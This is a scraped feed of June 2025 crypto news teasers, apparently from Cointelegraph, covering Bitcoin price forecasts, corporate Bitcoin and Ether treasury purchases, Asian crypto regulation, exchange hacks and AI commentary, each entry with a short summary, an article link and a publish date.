Will Bitcoin tap $119K if oil holds? SharpLink buys $463M ETH: Hodler’s Digest, June 8 – 14

A trader forecasts Bitcoin may reach $119,000 if oil price pattern holds, SharpLink Gaming has acquired $463 million Ether: Hodler’s Digest

Cryptocurrency entrepreneur Anthony Pompliano is reportedly in talks to launch a new Bitcoin-buying vehicle that will seek to raise $750 million.

Pompliano is expected to become CEO of ProCapBTC, a special purpose acquisition company that is set to merge with the publicly traded blank check vehicle Columbus Circle Capital 1, the Financial Times reported on Friday.

Under Pomplianos leadership, which is still under discussion, ProCapBTC would seek to raise $500 million in equity and $250 million in convertible debt as part of a merger with Columbus Circle Capital 1, backed by the Cohen&Company investment bank.

Read more

Article link

Date of publish: Sun, 15 Jun 2025 01:20:36 +0100

China threatened by US stablecoins, G7 urged to tackle Lazarus Group: Asia Express

Thailand sees 44% fall in Chinese tourists after crypto scam backlash, Japan to urge G7 to tackle North Korean crypto hackers. Asia Express.

Chinese academics are warning that the growth of stablecoins is a rising threat to China’s monetary sovereignty by enshrining the global dominance of the US dollar.

A commentary in China Economic Times argues that the rise of crypto comes with implications for sovereign credit systems, global governance models and the future of money.

China Economic Times is a daily newspaper sponsored by the Development Research Center of the State Council, one of the countrys highest-ranking policy research bodies. Government officials are part of the paper’s main reader base, and commentaries published by the paper often aim to influence or advise on economic strategy.

Read more

Article link

Date of publish: Thu, 12 Jun 2025 23:34:28 +0100

Jack Butcher’s no fan of NFT royalties: ‘You’re getting paid on churn’ — NFT Creator  

Jack Butcher — creator of meme culture NFT collection Opepen which has seen $240 million in volume — has an unexpected take on NFT royalties.

Before Jack Butcher became a household name in the NFT ecosystem before Checks, before Opepen, before his landmark 74 ETH ($123,500) sale in 2021 he was just a designer chasing clarity. Not hype. Not headlines. Just clarity.

Butchers journey didnt start in the memecoin trenches. It began in the agencies of London and New York, where he cut his teeth as a commercial designer.

I bounced around the agency scene for about 10 years. I basically worked in every commercial application of design you can think of, Butcher says. 

Read more

Article link

Date of publish: Thu, 12 Jun 2025 15:30:00 +0100

Older investors are risking everything for a crypto-funded retirement

Financial advisors warn against risking your retirement by going all in on crypto — but some older investors feel they have no other choice.

The time-honoured advice for older people approaching retirement is to reduce your exposure to risky assets to preserve your nest egg.

But what if your nest egg has already been destroyed and you need a high-risk/high-return method to make it all back in the space of a few years so you can retire comfortably?

Its not a strategy for the faint-hearted and it could easily go horribly wrong in the event of a sudden crash to a prolonged bear market but some crypto investors see it as their last, best hope. 

I think your risk appetite would have to be pretty extreme to have all your eggs in any one basket, especially if thats a volatile asset like crypto, says payments consultant and former banker Rod Tasker.

Read more

Article link

Date of publish: Wed, 11 Jun 2025 15:30:00 +0100

Elon Musk Dogecoin pump incoming? SOL tipped to hit $300 in 2025: Trade Secrets

Now Musk is out of DOGE, analysts say he might pump Dogecoin again. Plus what do crypto futures and prediction markets tip will happen next?

Welcome to Trade Secrets. This month, were talking to top crypto analysts about where Bitcoin and other major cryptocurrencies are going in the year ahead and checking the options data and prediction markets. 

Santiment analyst Maksim Balashhevich says now that Elon Musk is no longer working for the White House, he has time for more pro-Dogecoin antics, meaning another price rally could be on the horizon.

The fact that Musk and Trump are now fighting opens up the potential for Musk to return to his old crypto playbook, says Balashhevich.

Read more

Article link

Date of publish: Tue, 10 Jun 2025 15:30:00 +0100

Schrodinger’s Nakamoto, where everyone is and isn’t Satoshi

Benjamin Wallace has an amusingly direct way of trying to solve the identity of Bitcoin’s creator in his new book The Mysterious Mr Nakamoto.

Benjamin Wallace has an amusingly direct way of trying to solve the identity of Bitcoins creator in his new book The Mysterious Mr Nakamoto.

He just asks every possible candidate: Are you Satoshi Nakamoto?

I still didn’t rule out the possibility that Nakamoto was frustrated no one had bothered to simply ask him, Wallace tells Magazine. 

It seems like every other week, theres another newspaper investigation, documentary or nonfiction book promising to unmask Satoshi. 

Read more

Article link

Date of publish: Mon, 09 Jun 2025 05:59:32 +0100

Bitcoin $110K ‘bull trap’ concerns, James Wynn loses $25M BTC: Hodler’s Digest, June 1 – 7

Metaplanet plans to own 100,000 Bitcoin by the end of 2026, James Wynn lost $25 million in a Bitcoin bet: Hodler’s Digest

Metaplanet, also known as Japans Strategy, has updated its Bitcoin acquisition plans to acquiring 100,000 BTC by the end of 2026.

Metaplanet on June 6 posted its new Bitcoin plan, increasing its previous target of 21,000 BTC.

Our previous target to hold 21,000 BTC by the end of 2026 has now been dramatically revised upward. We now aim to hold 100,000 BTC by that time, Metaplanet CEO Simon Gerovich said in an announcement posted on X.

Read more

Article link

Date of publish: Sun, 08 Jun 2025 01:19:35 +0100

China to ban owning Bitcoin? Gate.io to pay $30M over liquidations: Asia Express

Asian media outlets report unverified rumors of Chinese ban on owning Bitcoin, Gate.io faces $30M bill after perps liquidation fiasco: Asia Express

The crypto industry has never been short on rumors suggesting that China is preparing to unban Bitcoin since the nations 2021 crackdown on crypto trading and mining.

But this past week, the narrative flipped, with some media outlets claiming that China is now banning Bitcoin ownership outright. One of the most widely circulated stories came from India-based Financial Express, which cited a supposed Binance report.

Magazine found no such report authored by Binance, and the exchange did not respond to a request for comment. Magazine also found no supporting reports from Chinese state media or official government sources.

Read more

Article link

Date of publish: Fri, 06 Jun 2025 00:00:44 +0100

AI is good for employment says PWC — Ignore the AI doomers: AI Eye

Ignore AI doomers predicting mass unemployment — PWC found AI-exposed industries create more value and pay workers higher wages. AI Eye.

Any student of predictions will tell you they are almost always wrong, especially the ones about the future. Most predictions about AI will be too.

Thanks to our prehistoric brains, humanity has a demonstrated capacity to ignore the 99 out of 100 predictions that are wrong and to focus instead on that one guy out of 100 who accidentally got it right.  

Everybody remembers how Michael Burry successfully predicted the Global Financial Crisis and profited from it, as shown in the movie The Big Short.

Read more

Article link

Date of publish: Thu, 05 Jun 2025 15:30:00 +0100

Baby boomers worth $79T are finally getting on board with Bitcoin

There are good reasons many Baby Boomers remain suspicious of Bitcoin — but even better reasons the wealthiest boomers are allocating to it.

Baby boomers are the fastest-growing demographic in crypto, with their numbers doubling in the space of a year, according to a survey by Australian exchange CoinSpot.

The total percentage of crypto investors over 60 remains relatively low around 4.4% but with their large retirement nest eggs and a lifetimes worth of savings, boomers have an outsized impact on markets.

Former ANZ banker and payments consultant Rod Tasker, himself a baby boomer, says active crypto investors in his age bracket tend to be highly financially literate.

“Even if the number is fairly low, the amount of money invested is quite likely to be higher than other demographics,” he explains.

“A lot of them are quite sophisticated, they’ve already got their investment portfolios. They might have the investment property, the share portfolio, depending on risk appetite they might have got into options,” he says.

Read more

Article link

Date of publish: Wed, 04 Jun 2025 15:30:00 +0100

US risks being ‘front run’ on Bitcoin reserve by other nations: Samson Mow

Samson Mow says that rapid nation state adoption and the race by corporations to acquire Bitcoin has not been priced in and $1M is inevitable.

JAN3 founder and uber Bitcoin maxi Samson Mow finds it absurd the US government is yet to start accumulating Bitcoin for its strategic reserve after giving the rest of the world the blueprint.

It would be incredibly ironic and unfortunate that the US, which took bold steps, and the Trump administration, which took bold steps to push this forward, gets front-run by other nation states that are inspired by their actions, the Chinese-Canadian Bitcoin entrepreneur tells Magazine.

Its been three months since Trump signed the executive order, and Mow says the US has to start acquiring Bitcoin this year. The risk is that the US is front-run by Pakistan, and they were on stage at Las Vegas saying, ‘well, you inspired us to start,’ the 13-year Bitcoiner explains.

Read more

Article link

Date of publish: Tue, 03 Jun 2025 15:30:00 +0100

Bitcoin $200K ‘obvious’ breakout, GameStop’s first BTC buy: Hodler’s Digest, May 25 – 31

Analysts anticipate a clear breakout for Bitcoin, GameStop makes its first move with the purchase of 4,710 Bitcoins: Hodler’s Digest

GameStop, the US video game and consumer electronics retailer, has confirmed its first Bitcoin investment, acquiring 4,710 Bitcoin, according to a statement posted May 28 on the companys X account.

The company did not specify how much it paid for the Bitcoin or when the purchases were made in the announcement, while its Form 8-K filing with the US Securities and Exchange Commission also offers little detail. The amount purchased was worth around $513 million at the time of writing.

The announced acquisition is GameStop’s first publicly acknowledged Bitcoin purchase since the company disclosed plans to move into Bitcoin investment in March.

Read more

Article link

Date of publish: Sun, 01 Jun 2025 01:01:15 +0100

China’s state-backed think tank considers Bitcoin reserve, Sony Bank goes Web3: Asia Express

Chinese state-backed think tank highlights Bitcoin as a reserve asset against USD, Sony’s online bank launches new crypto unit. Asia Express.

The International Monetary Institution (IMI), Chinas state-backed finance think tank, has republished an article that quietly elevates Bitcoin in the reserve asset debate.

The report by former White House economist Matthew Ferranti, originally published in October by the Bitcoin Policy Institute, argues that Bitcoin can serve as a hedge for central banks in developing economies, particularly those exposed to US dollar weaponization. It was republished by the IMI on its official WeChat account on May 28 with an editorial note stating Bitcoins rise as a reserve asset deserves continued attention.

The IMIs editorial note lays out that the appeal of US dollar assets is waning due to deficits, inflation and falling real yields. As a result, gold faces new challenges and Bitcoin is emerging as a serious contender for strategic reserves.

Read more

Article link

Date of publish: Thu, 29 May 2025 23:27:31 +0100

Coinbase hack shows the law probably won’t protect you: Here’s why

Crypto exchange terms of services you agreed to, but never read, prevent class actions and limit liability if your data or funds are stolen.

Coinbase is facing a flurry of lawsuits after disclosing a data breach that compromised nearly 70,000 customer accounts, with estimated losses reaching as high as $400 million.

The exchange says overseas customer support agents were bribed into helping scammers gain unauthorized access to user data in December. The company disclosed the attack to the public in May.

There were some reports that Coinbase had updated its user agreement just before announcing the breach, with critics accusing the company of adding an arbitration clause that limits class actions. Coinbase maintains that a class action waiver has long been part of its terms.

Read more

Article link

Date of publish: Thu, 29 May 2025 15:30:00 +0100

Move to Portugal to become a crypto digital nomad — Everybody else is

Your guide to moving to Portugal as a crypto digital nomad — and why 0% crypto gains tax and an amazing lifestyle makes it a great option.

New York-based pre-seed crypto venture firm manager Catrina Wang missed her flight home from a conference in Portugal back in 2022 and ended up loving the country so much she has since moved there permanently.

Forced to find a hotel at the last minute, her stay in the beautiful forested area of Sintra made the Canadian-born Wang rethink living in the United States.

I was like Wow, Im coming back and I bought a place at the end of 2023, she says. Wang now lives in beachfront Cascais on the outskirts of Lisbon. 

A general partner at Portal Ventures which manages $120 million in assets across two crypto funds, Wang says theres a growing expat community of crypto founders and VCs, many of whom shoot the breeze in a group chat she curates. 

There’s been almost a mini exodus of crypto people. A lot of fund managers and successful founders [went] from New York to Lisbon, that’s been a consistent trend, especially this year. 

Read more

Article link

Date of publish: Wed, 28 May 2025 15:30:00 +0100

Can Off the Grid survive Steam’s crypto ban? Rage over Maplestory cheaters: Web3 Gamer

How can Off the Grid launch on Steam when the platform banned crypto games in 2021? Plus LOL Land review and Maplestory cheaters. Web3 Gamer

Gunzilla Games shooter game Off The Grid widely regarded as the most successful crypto game yet is set to launch on the anti-crypto gaming platform Steam in June.

Shortly after Gunzilla Games CEO Vlad Korolev confirmed the news in a May 21 X post, gamers swarmed X with questions about how Off The Grids crypto elements could possibly fly under Steams strict anti-crypto policy.

Guessing this will be a different version due to the crypto aspect, or did yall find a work around, gamer Lord Bugz said. Another gamer, Merc, echoed similar confusion in a May 24 post:

Read more

Article link

Date of publish: Tue, 27 May 2025 15:30:00 +0100

Bitcoin bears eye $69K, CZ denies WLF ‘fixer’ rumors: Hodler’s Digest, May 18 – 24

Bitcoin traders are eyeing a gradual pullback after all-time highs, CZ refutes WSJ claim of ties to World Liberty Financial: Hodler’s Digest

Binance co-founder and former CEO Changpeng CZ Zhao has pushed back against a report in The Wall Street Journal, calling it a hit piece filled with inaccuracies and negative assumptions. 

In an X post, Zhao criticized the publications portrayal of his alleged involvement with World Liberty Financial, the decentralized finance project backed by a business entity affiliated with US President Donald Trump. Trumps sons Eric and Donald Jr. are involved in the management of the company.

Zhao said the WSJ article portrayed him as acting as a fixer for the World Liberty Financial team and its co-founder Zach Witkoff during foreign trips.

Read more

Article link

Date of publish: Sat, 24 May 2025 23:59:52 +0100

Crypto scam hub expose stunt goes viral, Kakao detects 70K scam apps: Asia Express

Viral footage of a YouTuber’s crypto scam hub expose stunt in the Philippines notches 2.7M views, Kakao uncovers 70K scam apps. Asia Express.

The Philippines’ Cybercrime Investigation and Coordinating Center (CICC) has launched an official investigation into a suspected scam operation based in the island city of Cebu, following a viral expos by YouTube content creator mrwn.

In a 23-minute video that has garnered over 2.7 million views on YouTube and is spreading rapidly across social media, mrwn reveals how he hacked into the scam centers computers and CCTV system, exposing what appears to be a fraud ring operating out of a call center-style office.

According to mrwn, the operation is estimated to earn $800,000 annually, with agents defrauding victims overseas through various methods, including stealing credit card data and coercing victims to transfer cryptocurrency via Bitcoin ATMs.

Read more

Article link

Date of publish: Thu, 22 May 2025 23:43:20 +0100

AI cures blindness, ‘good’ propaganda bots, OpenAI doomsday bunker: AI Eye

OpenAI’s doomsday bunker plan, the “potential benefits” of propaganda bots, plus the best fake books you can’t read this summer. AI Eye..

In the last AI Eye, we reported that scientists from the four leading AI companies believe theres at least a 10% chance of AI killing around 50% of humanity in the next decade one scientist was buying farmland in the US Midwest so he could ride out the AI apocalypse.

This week, it emerged that another doomsday prepper is OpenAI co-founder Ilya Sutskever.

According to Empire of AI author Karen Hao, he told key scientists in mid-2023 that “we’re definitely going to build a bunker before we release AGI.” Artificial general intelligence is the vaguely defined idea of a sentient intelligence smarter than humans.

The underground compound would protect the scientists from geopolitical chaos or violent competition between world powers once AGI was released. 

Read more

Article link

Date of publish: Thu, 22 May 2025 15:30:00 +0100

TradFi is building Ethereum L2s to tokenize trillions in RWAs: Inside story 

Big names, including Securitize, Ethena, Ant Digital and Tradeable, see custom-built Ethereum L2s as the future for trillions in RWAs.

Shortly before Ethereums shock 50% price surge earlier this month, when bearishness about its roadmap was reaching its zenith, Real Vision founder Raoul Pal was asked on a podcast if he thought Ethereum was cooked.

The former Goldman Sachs executive said hed heard that narrative a lot, but it was wrong not least because TradFi considers Ethereum to be the Microsoft of blockchain.

“It clearly works very well for what the financial markets need,” he said.

Read more

Article link

Date of publish: Wed, 21 May 2025 15:30:00 +0100

Here’s what happened in crypto today

Need to know what happened in crypto today? Here is the latest news on daily trends and events impacting Bitcoin price, blockchain, DeFi, NFTs, Web3 and crypto regulation.

Today in crypto, Kazakhstan’s central bank said it plans to establish a state-run crypto reserve, likely funded by seized digital assets and government-linked mining. Metaplanet has jumped to the fifth-largest corporate Bitcoin holder after its latest $108 million BTC purchase, and Michael Saylor signaled an eleventh consecutive week of Bitcoin buying by Strategy.

The National Bank of Kazakhstan plans to establish a state-managed cryptocurrency reserve, according to a Monday report by government news agency Kazinform.

Local authorities are studying the development of a crypto reserve, which would follow international practices. Typically, such reserves are likely to be funded with expropriated digital assets and state-run crypto mining operations, the report said.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 14:23:08 +0100

Ethereum risks 25% price drop as ‘massive whale’ moves $237M in ETH to exchanges

Big Ethereum holders are shrinking their balances while mid-sized wallets grow, signaling possible whale selling and potential downward pressure on ETH price.

Key takeaways:

Ethereum risks a 25% drop toward $1,600 after failing to break above a multi-year technical resistance.

A whale moved over $237 million in ETH to exchanges, aligning with rising ETH inflows into Binance over five straight days.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 15:38:13 +0100

BitMine raises $250M to launch Ethereum corporate treasury

BitMine Immersion Technologies raised $250 million through a private placement to establish an Ethereum treasury, signaling a shift away from its previous Bitcoin-centric approach.

Bitcoin miner BitMine Immersion Technologies has secured a $250 million private placement to jumpstart its Ether treasury.

BitMine signed a private placement for the purchase and sale of 55,555,556 shares of common stock for $4.50 per share, yielding gross proceeds of approximately $250 million before expenses, the company said in a Monday announcement.

MOZAYYX led the raise, with participation from Founders Fund, Pantera, FalconX, Republic Digital, Kraken, Galaxy Digital, DCG, Diametric Capital, Occam Crest Management and Thomas Lee. The transaction is expected to close on Thursday, provided that conditions, including the authorization of the Supplemental Listing Application by the NYSE American, are met.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 15:03:22 +0100

Bitcoin hashrate down 15%, 26 firms add BTC to balance sheets: June in charts

Bitcoin adoption grew considerably in June, with 26 firms adding it to their balance sheets; meanwhile, Bitcoin’s hashrate fell 15%.

This month, Bitcoin’s hashrate dropped 15% amid a summer heat wave that stressed the United States’ electricity grid. Crypto hacks and exploits have racked up record numbers, costing investors and platforms $150 million in June alone.

Moreover, businesses have followed the example of vocal Bitcoin (BTC) proponent and Strategy executive chairman Michael Saylor by adding BTC to their balance sheets. According to industry tracking services, there are now 250 companies that have some form of Bitcoin treasury.

Regulators in Asia are softening their stance on crypto, with new laws carving out crypto tax exemptions and permissions for stablecoin issuance in four different countries, including Hong Kong and South Korea.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 14:47:13 +0100

Tokenized stock trading live on Kraken, Bybit and Solana’s DeFi ecosystem

More than 60 tokenized stocks are now live on Kraken, Bybit and Solana DeFi via Backed Finance’s xStocks.

More than 60 tokenized stocks are now available on crypto exchanges Kraken and Bybit, as well as on Solana-based decentralized finance (DeFi) platforms.

In a Monday announcement from Backed Finance, the company said its tokenized stocks product, xStocks, had launched with over 60 stocks becoming available on Bybit, Kraken and several Solana DeFi protocols, offering users exposure to traditional stocks via blockchain infrastructure.

The stock selection is focused on blue-chip giants and crypto firms, emerging and established alike. Supported stocks include Netflix, Meta, Robinhood, Coinbase, Amazon, Nvidia, McDonald’s, Apple, Tesla and Microsoft, among others.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 14:01:28 +0100

Bitcoin’s new all-time high now ‘inevitable’ as BTC price eyes liquidity at $109K

Bitcoin's price hovered around $107,000, showing technical strength as BTC’s chance of rising to new all-time highs appears to be increasing, new analysis suggested.

Key takeaways:

Bitcoin price coils at $107,000 as liquidity builds up around the all-time highs.

A support/resistance flip at $109,000 is a must for the bulls as new record highs become “inevitable,” analyst said.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 13:32:36 +0100

Strategy buys $531M of Bitcoin as sentiment rebounds above $107K

Michael Saylor’s Strategy now holds 597,325 BTC, purchased for about $42.4 billion at an average price of $70,982 per coin.

Michael Saylor’s Strategy, the world’s largest public holder of Bitcoin, continued beefing up its BTC holdings last week amid rebounding investor sentiment and rising prices.

Strategy acquired 4,980 Bitcoin (BTC) for $531.1 million during the week ending Sunday, the company announced in a US Securities and Exchange Commission filing on Monday.

Strategy’s latest Bitcoin purchases averaged $106,801 per coin, with Bitcoin surging from around $101,000 on June 23 to above $108,000 by the end of the week, according to CoinGecko data.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 13:12:59 +0100

Chainlink reveals compliance standard, targets $100T institutional crypto flows

The new compliance solution may cut billions in compliance costs for institutions looking to invest in the crypto economy.

Chainlink, a decentralized blockchain oracle network for crosschain communication, launched a compliance framework aimed at unlocking over $100 trillion worth of institutional investor capital for the cryptocurrency space.

The decentralized oracle network announced the release of its Automated Compliance Engine (ACE) on Monday. The system provides a modular and standardized framework for managing regulatory compliance across both traditional and decentralized finance (DeFi) systems.

Chainlink said the new standard will allow the creation of compliance-focused digital assets and services across public and private blockchain networks, including reusable digital identities, automated policy enforcement, crosschain compliant digital asset settlement and regulated asset usage in DeFi.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 13:00:00 +0100

JPMorgan rates Circle underweight with $80 target by late 2026

While seeing Circle as well-positioned in the market, JPMorgan analysts warned that competition is a potential threat to the stablecoin issuer.

Analysts at JPMorgan, a major US investment bank, have initiated coverage of Circle (CRCL) shares with an underweight rating and a $80 price target by December 2026.

JPMorgan’s analysts, led by Kenneth Worthington, on Monday presented their first formal Circle stock analysis in the “North America Equity Research” report, seen by Cointelegraph.

Down 55% from the current CRCL price of $180, the forecast is based on a 45x multiple of projected 2027 earnings per share (EPS) plus a $10 premium for upside potential.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 12:42:37 +0100

Kazakhstan plans to establish national crypto reserve

Kazakhstan’s central bank is set to establish a state-run crypto reserve, likely funded by seized digital assets and government-linked mining.

The National Bank of Kazakhstan plans to establish a state-managed cryptocurrency reserve, according to a Monday report by government news agency Kazinform.

Local authorities are studying the development of a crypto reserve, which would follow international practices. Typically, such reserves are likely to be funded with expropriated digital assets and state-run crypto mining operations, the report said.

National Bank of Kazakhstan Chairman Timur Suleimenov acknowledged the volatility and risks associated with crypto assets. He said that placing the reserve under the control of a centralized institution would ensure proper oversight and risk management.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 11:53:47 +0100

Crypto ETP inflows in H1 2025 down 2.7% from last year’s $18.3B

Crypto ETPs saw $17.8 billion of inflows in the first half of 2025, down 2.7% from last year’s $18.3 billion, according to CoinShares.

Cryptocurrency investment products posted another strong week, bringing total inflows for the first half of 2025 close to last year’s figure, according to a new report from digital asset manager CoinShares.

Global crypto exchange-traded products (ETPs) posted $2.7 billion in inflows in the trading week ending Friday, marking 11 consecutive weeks of inflows, CoinShares reported on Monday.

Given all half-year inflows minus outflows, crypto ETP gains totaled $17.8 billion in inflows, 2.7% down from last year’s $18.3 billion, said CoinShares’ head of research, James Butterfill.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 10:42:03 +0100

Bhutan embraces crypto payments despite connectivity gaps

Cointelegraph is in the Kingdom of Bhutan to check the state of crypto adoption in the eastern Himalayan country.

In a land where ancient monasteries overlook misty mountains, cryptocurrency is quietly becoming part of everyday life.

During the Binance Crypto-Powered Tour in the Kingdom of Bhutan, Cointelegraph traveled across Bhutan’s capital city of Thimphu and the popular cultural and tourism district of Paro to gauge grassroots interest in crypto. 

At Changyul Park and a local four-star hotel, Cointelegraph witnessed firsthand how tourists and locals pay with crypto only months after crypto exchange Binance rolled out crypto payments in the country. 

Read more

Article link

Date of publish: Mon, 30 Jun 2025 10:38:24 +0100

Record Q2, monthly close next? 5 things to know in Bitcoin this week

Bitcoin is on the cusp of beating several historical all-time highs as a trader warns that "games are being played" in an increasingly volatile environment.

Bitcoin (BTC) heads into a key double candle close just inches from records; can bulls stay in control?

Bitcoin order-book liquidity games continue as the monthly and quarterly close sets the stage for sudden price moves.

BTC/USD only needs to close June at $104,630 to seal its highest-ever monthly close.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 09:58:07 +0100

Hacked Iranian crypto exchange Nobitex slowly restores services

Hacked Iranian crypto exchange Nobitex is slated to resume withdrawal services, starting with verified users.

Hacked Iranian crypto exchange Nobitex has begun the process of restoring services after it was attacked by pro-Israel hacker group Gonjeshke Darande earlier this month.

The exchange stated that only users who have completed identity verification will have access to the wallet, with spot exchange users being given priority.

Nobitex said users should avoid depositing their crypto into the exchange’s old wallets, as it could lead to users losing their funds.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 07:37:45 +0100

Unlucky trader ‘qwatio’ liquidated 8 times in a week, loses $12.5M

A trader under the handle qwatio has been liquidated eight times in the last week, with the latest a partial liquidation of an Ether position leveraged by 25X.

An unlucky trader was liquidated eight times in the last week, according to blockchain analytics service Lookonchain. 

The trader, under the handle qwatio, saw a total loss of $12.5 million. In the latest liquidation on Monday, Lookonchain said qwatio was partially liquidated for an Ether (ETH) position that was leveraged by 25X.

A new liquidation price was set for $2,534, and Ether has been drifting between $2,425 and $2,519 in the last 24 hours. 

Read more

Article link

Date of publish: Mon, 30 Jun 2025 07:23:32 +0100

South Korea pauses CBDC tests as stablecoin fever hits banks

The Bank of Korea reportedly suspended its central bank digital currency trials as participating banks are tempted by the government’s promise to allow stablecoins.

South Korea’s central bank has reportedly postponed the testing of a central bank digital currency (CBDC) as the country’s government has increasingly aired support for local currency stablecoins.

On Sunday, the Bank of Korea told banks taking part in CBDC tests that started in April that it was temporarily suspending and postponing the second round of tests slated for later this year, local outlets the Yonhap News Agency and The Chosun Daily reported on Monday.

A senior official at one of the seven banks taking part in the tests told Yonhap that the central bank is waiting to see the government’s plans for stablecoins and how a CBDC would fit with such tokens.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 07:14:15 +0100

Metaplanet surpasses Cleanspark with $108M Bitcoin buy

Metaplanet has become the fifth-largest corporate Bitcoin holder after its latest $108 million purchase, which comes on the same day the Japanese firm issued 0% interest bonds to buy more.

Japanese Bitcoin treasury firm Metaplanet has surpassed mining company Cleanspark in becoming the fifth-largest corporate holder of Bitcoin (BTC) after buying another 1,005 BTC for $108 million.

The firm now holds 13,350 BTC acquired for around $1.31 billion at around $97,832 per Bitcoin. At current market prices, the treasury is worth $1.45 billion. 

Bitcoin mining company CleanSpark holds 12,502 BTC, according to BiTBO. The firm has eclipsed Tesla, Hut 8, Coinbase and Block Inc. in Bitcoin treasury size and now only trails Strategy, Marathon Digital, Twenty One Capital and Riot Platforms.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 06:32:02 +0100

BNB Smart Chain block times fall to 0.8 secs amid Maxwell upgrade

BNB Smart Chain’s Maxwell hard fork has three main proposals to boost scalability, validator sync and overall network efficiency.

BNB Smart Chain’s Maxwell upgrade has gone live, with average block times falling to 0.8 seconds, down from 1.5 on Monday.

The Maxwell hard fork aimed to cut block times in half, among other upgrades.  

BNB Chain said on Thursday that the Maxwell upgrade will make transactions faster for users, create more responsive decentralized applications (DApps) for developers, lower the latency for decentralized finance, boost scalability, validator sync and improve overall network efficiency.

Read more

Article link

Date of publish: Mon, 30 Jun 2025 05:16:42 +0100

Bitcoin price stuck as OGs are ‘dumping on Wall Street’: Analyst

Long-term Bitcoin holders have been selling to institutions since spot ETFs launched, keeping prices stagnant.

Long-term holder selling pressure has stunted the growth of Bitcoin's price, despite recent moves from institutions and corporations to buy the asset, according to an analyst. 

“People are wondering why Bitcoin has been stuck at $100K so long, despite the institutional FOMO,” said Capriole Investments founder Charles Edwards on Sunday. 

He added that this is largely due to Bitcoin (BTC) OGs — long-term holders — who have been “dumping on Wall Street” and “unloading their positions” since the spot Bitcoin exchange-traded funds launched in January 2024. 

Read more

Article link

Date of publish: Mon, 30 Jun 2025 04:51:25 +0100

Arbitrum jumps 17% on speculation of partnership with Robinhood

Speculation has been growing of a potential tie-up between Arbitrum and Robinhood Markets after an X post.

The token for the Ethereum layer-2 blockchain, Arbitrum, gained 17% over the day amid speculation that the network will announce a partnership with US trading platform Robinhood Markets Inc. on Monday.

Robinhood posted to X on Sunday that Ethereum co-founder Vitalik Buterin, Robinhood Crypto general manager Johann Kerbrat, and A.J. Warner, the chief strategy officer at Offchain Labs — which created and develops Arbitrum — would come together for a fireside chat on Monday.

The chat will take place at a Robinhood Europe-hosted event in Cannes, France, which the firm markets as unveiling its “biggest crypto announcements of the year.”

Read more

Article link

Date of publish: Mon, 30 Jun 2025 04:01:48 +0100

Growing dissatisfaction among young people to drive BTC price: Analyst

Jordi Visser argued that growing dissatisfaction among those 25 and younger with the current financial system will increase BTC adoption.

Younger generations disillusioned by the current financial system and calling for a socialist system financed through increased public spending will force the price of Bitcoin (BTC) higher in the long term, according to market analyst Jordi Visser.

In a Sunday episode of entrepreneur Anthony Pompliano’s podcast, Visser said younger generations, those 25 and lower, are fighting against the rising tide of AI-driven job displacement and economic uncertainty, leading to growing calls to replace the capitalist system with a regime of increased social benefits fueled by public spending.

“The younger people don't have a belief that the system will come back. They believe the system has been worsening every single year,” Visser said.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 22:48:11 +0100

Bitcoin aims for highest weekly close: Will HYPE, BCH, LINK, and SEI follow?

Bitcoin price made a weekend rush on the $109,000 resistance and HYPE, BCH, LINK and SEI could be the first altcoins to rally if BTC bulls secure new highs.

Key points:

Bitcoin aims for its highest weekly close above $109,000, but higher levels are likely to attract sellers.

HYPE, BCH, LINK, and SEI could extend their rallies if Bitcoin price stays above $105,000.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 22:21:44 +0100

Saylor signals impending Bitcoin buy for 11th consecutive week

Michael Saylor's Strategy is up over 52% on its Bitcoin investment, representing an unrealized capital gain of over $21.8 billion.

Strategy co-founder Michael Saylor signaled the company’s 11th consecutive week of Bitcoin (BTC) purchases, a streak that began on April 14.

“In 21 years, you’ll wish you’d bought more,” Saylor wrote to his 4.4 million followers on X. The Strategy co-founder has gained roughly 1 million followers on the social media platform over the last year.

The company’s most recent Bitcoin acquisition occurred on June 23, when Strategy purchased 245 BTC for $26 million, bringing its total holdings to 592,345 BTC, valued at over $63.6 billion.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 20:53:33 +0100

How mass decoy messaging protects whistleblowers — CoverDrop founder

The growing sophistication of the mass surveillance state has created the need for new tools to obfuscate identity and restore anonymity.

Mass decoy messaging between news agencies and readers can help protect the identity of whistleblowers, according to Dr. Manny Ahmed, the founder of CoverDrop, a whistleblower protection tool, and OpenOrigins, a blockchain firm that provides data provenance for images and videos to ensure authenticity. Both tools work in symbiosis to ensure trusted communications.

In an interview with Cointelegraph, Dr. Ahmed said that CoverDrop works by sending out large amounts of decoy encrypted messaging traffic between the readers of a news platform and the news platform itself.

This creates the illusion that every reader is a whistleblower, thus drowning out the identity of any true whistleblowers in a sea of digital noise. The executive outlined the problem whistleblowers currently face in the age of digital surveillance:

Read more

Article link

Date of publish: Sun, 29 Jun 2025 18:48:51 +0100

The renaissance returns with decentralized AI

Decentralized AI breaks open the gates of intelligence, with communities worldwide building, customizing and governing their own tools. DeAI dismantles centralized control and empowers communities to create and govern their own AI systems.

Opinion by: Matt Wright, co-founder and chief executive officer of Gaia

In the mid-1400s, Gutenberg’s press removed the monopoly on written knowledge. Literacy expanded, institutions changed and the public finally gained access to ideas locked behind elite control.

Today, decentralized artificial intelligence (DeAI) triggers a similar shift by expanding access to intelligence and reshaping who gets to build with it.

Read more

Article link

Date of publish: Sun, 29 Jun 2025 16:00:00 +0100

Stablecoins are becoming ‘default settlement layer’ for internet: Alchemy

Stablecoins are now the “default settlement layer for the internet,” surpassing Visa and Mastercard in onchain transaction volume.

Stablecoins have become the backbone of internet payments, with adoption now outpacing major traditional card networks in onchain volume, according to Noam Hurwitz, head of engineering at Alchemy.

